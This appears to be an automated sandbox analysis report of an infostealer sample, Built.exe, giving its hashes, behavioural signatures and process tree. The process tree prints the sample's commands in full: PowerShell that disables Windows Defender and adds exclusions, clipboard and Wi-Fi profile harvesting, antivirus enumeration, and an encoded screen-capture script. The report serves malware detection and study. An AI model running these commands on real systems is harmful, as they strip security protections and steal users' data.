Analysis
-
max time kernel
90s -
max time network
94s -
platform
windows11-21h2_x64 -
resource
win11-20240611-fr -
resource tags
arch:x64arch:x86image:win11-20240611-frlocale:fr-fros:windows11-21h2-x64systemwindows -
submitted
26-06-2024 13:10
Behavioral task
behavioral1
Sample
Built.exe
Resource
win10-20240611-fr
Behavioral task
behavioral2
Sample
Built.exe
Resource
win10v2004-20240611-fr
Behavioral task
behavioral3
Sample
Built.exe
Resource
win11-20240611-fr
General
-
Target
Built.exe
-
Size
224.0MB
-
MD5
f3c0061c28b07f1ccada3dca9755b304
-
SHA1
dd41b3edb8abf9a0147695b7dd7f285f8d5aef1e
-
SHA256
77e67941a20d70449b0a5ba735a279f1d81429d9ea08181591cf910f69b04b71
-
SHA512
1e804d2a9e5cac5c65ee93b0c30f36916f928e8e17aa339e5db7778725bcc42ba4318f28d30eca15bc8671eea6289602e92ccd9a45b6f4f86f8d05b9e56a5707
-
SSDEEP
196608:HJq+sxft1urErvI9pWjgU1DEzx7sKLus1tPAkjUWlRHK0:0Xxft1urEUWjhEhnx1tl9K0
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepid process 484 powershell.exe 1276 powershell.exe 1980 powershell.exe -
Drops file in Drivers directory 3 IoCs
Processes:
attrib.exeBuilt.exeattrib.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Built.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Executes dropped EXE 1 IoCs
Processes:
rar.exepid process 4948 rar.exe -
Loads dropped DLL 17 IoCs
Processes:
Built.exepid process 4392 Built.exe 4392 Built.exe 4392 Built.exe 4392 Built.exe 4392 Built.exe 4392 Built.exe 4392 Built.exe 4392 Built.exe 4392 Built.exe 4392 Built.exe 4392 Built.exe 4392 Built.exe 4392 Built.exe 4392 Built.exe 4392 Built.exe 4392 Built.exe 4392 Built.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI25922\python312.dll upx behavioral3/memory/4392-24-0x00007FFAC9050000-0x00007FFAC9729000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI25922\_ctypes.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI25922\libffi-8.dll upx behavioral3/memory/4392-30-0x00007FFADB510000-0x00007FFADB535000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI25922\_ssl.pyd upx behavioral3/memory/4392-48-0x00007FFAE2D40000-0x00007FFAE2D4F000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI25922\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI25922\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI25922\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI25922\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI25922\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI25922\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI25922\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI25922\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI25922\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI25922\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI25922\libssl-3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI25922\libcrypto-3.dll upx behavioral3/memory/4392-54-0x00007FFADB460000-0x00007FFADB48D000-memory.dmp upx behavioral3/memory/4392-57-0x00007FFADB440000-0x00007FFADB459000-memory.dmp upx behavioral3/memory/4392-58-0x00007FFADB350000-0x00007FFADB374000-memory.dmp upx behavioral3/memory/4392-60-0x00007FFAD5D20000-0x00007FFAD5E96000-memory.dmp upx behavioral3/memory/4392-62-0x00007FFADB420000-0x00007FFADB439000-memory.dmp upx behavioral3/memory/4392-64-0x00007FFAE0800000-0x00007FFAE080D000-memory.dmp upx behavioral3/memory/4392-68-0x00007FFADA310000-0x00007FFADA3DD000-memory.dmp upx behavioral3/memory/4392-67-0x00007FFADA3E0000-0x00007FFADA413000-memory.dmp upx behavioral3/memory/4392-72-0x00007FFAC8B20000-0x00007FFAC9049000-memory.dmp upx behavioral3/memory/4392-71-0x00007FFAC9050000-0x00007FFAC9729000-memory.dmp upx behavioral3/memory/4392-75-0x00007FFADB510000-0x00007FFADB535000-memory.dmp upx behavioral3/memory/4392-78-0x00007FFAE06B0000-0x00007FFAE06BD000-memory.dmp upx behavioral3/memory/4392-80-0x00007FFAD5D20000-0x00007FFAD5E96000-memory.dmp upx behavioral3/memory/4392-81-0x00007FFAC8A00000-0x00007FFAC8B1B000-memory.dmp upx behavioral3/memory/4392-77-0x00007FFADA6C0000-0x00007FFADA6D4000-memory.dmp upx behavioral3/memory/4392-207-0x00007FFADB350000-0x00007FFADB374000-memory.dmp upx behavioral3/memory/4392-314-0x00007FFADB510000-0x00007FFADB535000-memory.dmp upx behavioral3/memory/4392-313-0x00007FFAC9050000-0x00007FFAC9729000-memory.dmp upx behavioral3/memory/4392-323-0x00007FFADA310000-0x00007FFADA3DD000-memory.dmp upx behavioral3/memory/4392-322-0x00007FFADA3E0000-0x00007FFADA413000-memory.dmp upx behavioral3/memory/4392-319-0x00007FFAD5D20000-0x00007FFAD5E96000-memory.dmp upx behavioral3/memory/4392-324-0x00007FFAC8B20000-0x00007FFAC9049000-memory.dmp upx behavioral3/memory/4392-347-0x00007FFAC9050000-0x00007FFAC9729000-memory.dmp upx behavioral3/memory/4392-378-0x00007FFAC9050000-0x00007FFAC9729000-memory.dmp upx behavioral3/memory/4392-390-0x00007FFADA6C0000-0x00007FFADA6D4000-memory.dmp upx behavioral3/memory/4392-402-0x00007FFAE06B0000-0x00007FFAE06BD000-memory.dmp upx behavioral3/memory/4392-401-0x00007FFADA3E0000-0x00007FFADA413000-memory.dmp upx behavioral3/memory/4392-400-0x00007FFAE0800000-0x00007FFAE080D000-memory.dmp upx behavioral3/memory/4392-399-0x00007FFADB420000-0x00007FFADB439000-memory.dmp upx behavioral3/memory/4392-398-0x00007FFADA310000-0x00007FFADA3DD000-memory.dmp upx behavioral3/memory/4392-397-0x00007FFADB350000-0x00007FFADB374000-memory.dmp upx behavioral3/memory/4392-396-0x00007FFADB440000-0x00007FFADB459000-memory.dmp upx behavioral3/memory/4392-395-0x00007FFADB460000-0x00007FFADB48D000-memory.dmp upx behavioral3/memory/4392-394-0x00007FFAE2D40000-0x00007FFAE2D4F000-memory.dmp upx behavioral3/memory/4392-392-0x00007FFAC8A00000-0x00007FFAC8B1B000-memory.dmp upx behavioral3/memory/4392-389-0x00007FFAC8B20000-0x00007FFAC9049000-memory.dmp upx behavioral3/memory/4392-384-0x00007FFAD5D20000-0x00007FFAD5E96000-memory.dmp upx behavioral3/memory/4392-393-0x00007FFADB510000-0x00007FFADB535000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
WMIC.exeWMIC.exeWMIC.exepid process 3756 WMIC.exe 3060 WMIC.exe 2556 WMIC.exe -
Enumerates processes with tasklist 1 TTPs 5 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid process 4776 tasklist.exe 5096 tasklist.exe 4128 tasklist.exe 2324 tasklist.exe 2348 tasklist.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Suspicious behavior: EnumeratesProcesses 20 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 484 powershell.exe 4156 powershell.exe 484 powershell.exe 4156 powershell.exe 1276 powershell.exe 1276 powershell.exe 1284 powershell.exe 1284 powershell.exe 1980 powershell.exe 1980 powershell.exe 1284 powershell.exe 1980 powershell.exe 4876 powershell.exe 4876 powershell.exe 2212 powershell.exe 2212 powershell.exe 1528 powershell.exe 1528 powershell.exe 2012 powershell.exe 2012 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exeWMIC.exetasklist.exeWMIC.exedescription pid process Token: SeDebugPrivilege 4156 powershell.exe Token: SeDebugPrivilege 484 powershell.exe Token: SeIncreaseQuotaPrivilege 4864 WMIC.exe Token: SeSecurityPrivilege 4864 WMIC.exe Token: SeTakeOwnershipPrivilege 4864 WMIC.exe Token: SeLoadDriverPrivilege 4864 WMIC.exe Token: SeSystemProfilePrivilege 4864 WMIC.exe Token: SeSystemtimePrivilege 4864 WMIC.exe Token: SeProfSingleProcessPrivilege 4864 WMIC.exe Token: SeIncBasePriorityPrivilege 4864 WMIC.exe Token: SeCreatePagefilePrivilege 4864 WMIC.exe Token: SeBackupPrivilege 4864 WMIC.exe Token: SeRestorePrivilege 4864 WMIC.exe Token: SeShutdownPrivilege 4864 WMIC.exe Token: SeDebugPrivilege 4864 WMIC.exe Token: SeSystemEnvironmentPrivilege 4864 WMIC.exe Token: SeRemoteShutdownPrivilege 4864 WMIC.exe Token: SeUndockPrivilege 4864 WMIC.exe Token: SeManageVolumePrivilege 4864 WMIC.exe Token: 33 4864 WMIC.exe Token: 34 4864 WMIC.exe Token: 35 4864 WMIC.exe Token: 36 4864 WMIC.exe Token: SeDebugPrivilege 2348 tasklist.exe Token: SeIncreaseQuotaPrivilege 4864 WMIC.exe Token: SeSecurityPrivilege 4864 WMIC.exe Token: SeTakeOwnershipPrivilege 4864 WMIC.exe Token: SeLoadDriverPrivilege 4864 WMIC.exe Token: SeSystemProfilePrivilege 4864 WMIC.exe Token: SeSystemtimePrivilege 4864 WMIC.exe Token: SeProfSingleProcessPrivilege 4864 WMIC.exe Token: SeIncBasePriorityPrivilege 4864 WMIC.exe Token: SeCreatePagefilePrivilege 4864 WMIC.exe Token: SeBackupPrivilege 4864 WMIC.exe Token: SeRestorePrivilege 4864 WMIC.exe Token: SeShutdownPrivilege 4864 WMIC.exe Token: SeDebugPrivilege 4864 WMIC.exe Token: SeSystemEnvironmentPrivilege 4864 WMIC.exe Token: SeRemoteShutdownPrivilege 4864 WMIC.exe Token: SeUndockPrivilege 4864 WMIC.exe Token: SeManageVolumePrivilege 4864 WMIC.exe Token: 33 4864 WMIC.exe Token: 34 4864 WMIC.exe Token: 35 4864 WMIC.exe Token: 36 4864 WMIC.exe Token: SeIncreaseQuotaPrivilege 3756 WMIC.exe Token: SeSecurityPrivilege 3756 WMIC.exe Token: SeTakeOwnershipPrivilege 3756 WMIC.exe Token: SeLoadDriverPrivilege 3756 WMIC.exe Token: SeSystemProfilePrivilege 3756 WMIC.exe Token: SeSystemtimePrivilege 3756 WMIC.exe Token: SeProfSingleProcessPrivilege 3756 WMIC.exe Token: SeIncBasePriorityPrivilege 3756 WMIC.exe Token: SeCreatePagefilePrivilege 3756 WMIC.exe Token: SeBackupPrivilege 3756 WMIC.exe Token: SeRestorePrivilege 3756 WMIC.exe Token: SeShutdownPrivilege 3756 WMIC.exe Token: SeDebugPrivilege 3756 WMIC.exe Token: SeSystemEnvironmentPrivilege 3756 WMIC.exe Token: SeRemoteShutdownPrivilege 3756 WMIC.exe Token: SeUndockPrivilege 3756 WMIC.exe Token: SeManageVolumePrivilege 3756 WMIC.exe Token: 33 3756 WMIC.exe Token: 34 3756 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Built.exeBuilt.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2592 wrote to memory of 4392 2592 Built.exe Built.exe PID 2592 wrote to memory of 4392 2592 Built.exe Built.exe PID 4392 wrote to memory of 712 4392 Built.exe cmd.exe PID 4392 wrote to memory of 712 4392 Built.exe cmd.exe PID 4392 wrote to memory of 4840 4392 Built.exe cmd.exe PID 4392 wrote to memory of 4840 4392 Built.exe cmd.exe PID 4392 wrote to memory of 3632 4392 Built.exe cmd.exe PID 4392 wrote to memory of 3632 4392 Built.exe cmd.exe PID 4392 wrote to memory of 3096 4392 Built.exe cmd.exe PID 4392 wrote to memory of 3096 4392 Built.exe cmd.exe PID 4840 wrote to memory of 4156 4840 cmd.exe powershell.exe PID 4840 wrote to memory of 4156 4840 cmd.exe powershell.exe PID 712 wrote to memory of 484 712 cmd.exe powershell.exe PID 712 wrote to memory of 484 712 cmd.exe powershell.exe PID 3096 wrote to memory of 4864 3096 cmd.exe WMIC.exe PID 3096 wrote to memory of 4864 3096 cmd.exe WMIC.exe PID 3632 wrote to memory of 2348 3632 cmd.exe tasklist.exe PID 3632 wrote to memory of 2348 3632 cmd.exe tasklist.exe PID 4392 wrote to memory of 5104 4392 Built.exe cmd.exe PID 4392 wrote to memory of 5104 4392 Built.exe cmd.exe PID 5104 wrote to memory of 3528 5104 cmd.exe reg.exe PID 5104 wrote to memory of 3528 5104 cmd.exe reg.exe PID 4392 wrote to memory of 3668 4392 Built.exe cmd.exe PID 4392 wrote to memory of 3668 4392 Built.exe cmd.exe PID 3668 wrote to memory of 3560 3668 cmd.exe reg.exe PID 3668 wrote to memory of 3560 3668 cmd.exe reg.exe PID 4392 wrote to memory of 3064 4392 Built.exe cmd.exe PID 4392 wrote to memory of 3064 4392 Built.exe cmd.exe PID 3064 wrote to memory of 3756 3064 cmd.exe WMIC.exe PID 3064 wrote to memory of 3756 3064 cmd.exe WMIC.exe PID 4392 wrote to memory of 464 4392 Built.exe cmd.exe PID 4392 wrote to memory of 464 4392 Built.exe cmd.exe PID 464 wrote to memory of 3060 464 cmd.exe WMIC.exe PID 464 wrote to memory of 3060 464 cmd.exe WMIC.exe PID 4392 wrote to memory of 5060 4392 Built.exe cmd.exe PID 4392 wrote to memory of 5060 4392 Built.exe cmd.exe PID 5060 wrote to memory of 1276 5060 cmd.exe powershell.exe PID 5060 wrote to memory of 1276 5060 cmd.exe powershell.exe PID 4392 wrote to memory of 3924 4392 Built.exe cmd.exe PID 4392 wrote to memory of 3924 4392 Built.exe cmd.exe PID 4392 wrote to memory of 2140 4392 Built.exe cmd.exe PID 4392 wrote to memory of 2140 4392 Built.exe cmd.exe PID 2140 wrote to memory of 4776 2140 cmd.exe tasklist.exe PID 2140 wrote to memory of 4776 2140 cmd.exe tasklist.exe PID 3924 wrote to memory of 5096 3924 cmd.exe tasklist.exe PID 3924 wrote to memory of 5096 3924 cmd.exe tasklist.exe PID 4392 wrote to memory of 1140 4392 Built.exe cmd.exe PID 4392 wrote to memory of 1140 4392 Built.exe cmd.exe PID 4392 wrote to memory of 4084 4392 Built.exe cmd.exe PID 4392 wrote to memory of 4084 4392 Built.exe cmd.exe PID 4392 wrote to memory of 3532 4392 Built.exe cmd.exe PID 4392 wrote to memory of 3532 4392 Built.exe cmd.exe PID 4392 wrote to memory of 4548 4392 Built.exe cmd.exe PID 4392 wrote to memory of 4548 4392 Built.exe cmd.exe PID 4392 wrote to memory of 2912 4392 Built.exe cmd.exe PID 4392 wrote to memory of 2912 4392 Built.exe cmd.exe PID 4392 wrote to memory of 2288 4392 Built.exe cmd.exe PID 4392 wrote to memory of 2288 4392 Built.exe cmd.exe PID 1140 wrote to memory of 1316 1140 cmd.exe Conhost.exe PID 1140 wrote to memory of 1316 1140 cmd.exe Conhost.exe PID 4392 wrote to memory of 2692 4392 Built.exe cmd.exe PID 4392 wrote to memory of 2692 4392 Built.exe cmd.exe PID 4392 wrote to memory of 2988 4392 Built.exe cmd.exe PID 4392 wrote to memory of 2988 4392 Built.exe cmd.exe -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 4532 attrib.exe 4872 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4392 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:712 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:484 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:4840 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4156 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3632 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2348 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4864 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:5104 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:3528
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:3668 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:3560
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:3756 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:464 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:3060 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:5060 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1276 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3924 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:5096 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4776 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:1140 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:1316
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵PID:4084
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1284 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:3532
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4128 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4548
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:2600
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵PID:2912
-
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4996 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:2288
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:1008 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:2692
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:3904
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAH